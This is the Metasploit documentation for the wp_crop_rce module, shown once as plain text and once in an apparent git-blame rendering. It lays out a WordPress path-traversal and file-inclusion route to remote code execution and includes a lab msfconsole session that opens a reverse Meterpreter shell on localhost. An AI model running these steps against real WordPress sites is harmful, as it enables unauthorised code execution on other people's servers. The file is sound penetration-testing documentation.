documentation/modules/exploit/multi/http/wp_crop_rce.md

On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.

## Exploitation Steps

1. Upload an image containing PHP code
2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
3. Perform the Path Traversal by using the `crop-image` Wordpress function
4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.

When visiting the post created by the attacker it is possible to obtain code execudion.

More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).

## Verification Steps

Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/http/wp_crop_rce`
3. Set the `RHOST`
4. Set `USERNAME` and `PASSWORD`
4. Set `LHOST` and `LPORT`
5. Run the exploit: `run`
6. Confirm you have now a meterpreter session

## Options

### THEME_DIR

The name of the theme Wordpress is using. Used if
the theme cannot be auto-detected.

## Scenarios

### Ubuntu 18.04 running WordPress 4.9.8

```
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```
Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00			`On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.`
			`An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.`

			`## Exploitation Steps`

			`1. Upload an image containing PHP code`
			2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
			3. Perform the Path Traversal by using the `crop-image` Wordpress function
			4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.

			`When visiting the post created by the attacker it is possible to obtain code execudion.`

			`More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).`

			`## Verification Steps`

			`Confirm that functionality works:`
			1. Start `msfconsole`
modified scenario output for path 2019-03-25 13:58:58 -05:00			2. `use exploit/multi/http/wp_crop_rce`
Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00			3. Set the `RHOST`
			4. Set `USERNAME` and `PASSWORD`
			4. Set `LHOST` and `LPORT`
			5. Run the exploit: `run`
			`6. Confirm you have now a meterpreter session`

add option in documentation and add notes 2022-10-25 12:22:00 -05:00			`## Options`

			`### THEME_DIR`

			`The name of the theme Wordpress is using. Used if`
			`the theme cannot be auto-detected.`
Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00
			`## Scenarios`

			`### Ubuntu 18.04 running WordPress 4.9.8`

			```
modified scenario output for path 2019-03-25 13:58:58 -05:00			`msf5 > use exploit/multi/http/wp_crop_rce`
			`msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1`
Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00			`rhosts => 127.0.0.1`
modified scenario output for path 2019-03-25 13:58:58 -05:00			`msf5 exploit(multi/http/wp_crop_rce) > set username author`
Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00			`username => author`
modified scenario output for path 2019-03-25 13:58:58 -05:00			`msf5 exploit(multi/http/wp_crop_rce) > set password author`
Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00			`password => author`
modified scenario output for path 2019-03-25 13:58:58 -05:00			`msf5 exploit(multi/http/wp_crop_rce) > run`
Adding documentation + cleaning files from the exploit 2019-03-22 17:37:04 +01:00
			`[*] Started reverse TCP handler on 127.0.0.1:4444`
			`[*] Authenticating with WordPress using author:author...`
			`[+] Authenticated with WordPress`
			`[*] Preparing payload...`
			`[*] Checking crop library`
			`[*] Uploading payload`
			`[+] Image uploaded`
			`[*] Uploading payload`
			`[+] Image uploaded`
			`[*] Including into theme`
			`[*] Sending stage (38247 bytes) to 127.0.0.1`
			`[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400`

			`meterpreter > sysinfo`
			`Computer : ubuntu`
			`OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64`
			`Meterpreter : php/linux`
			```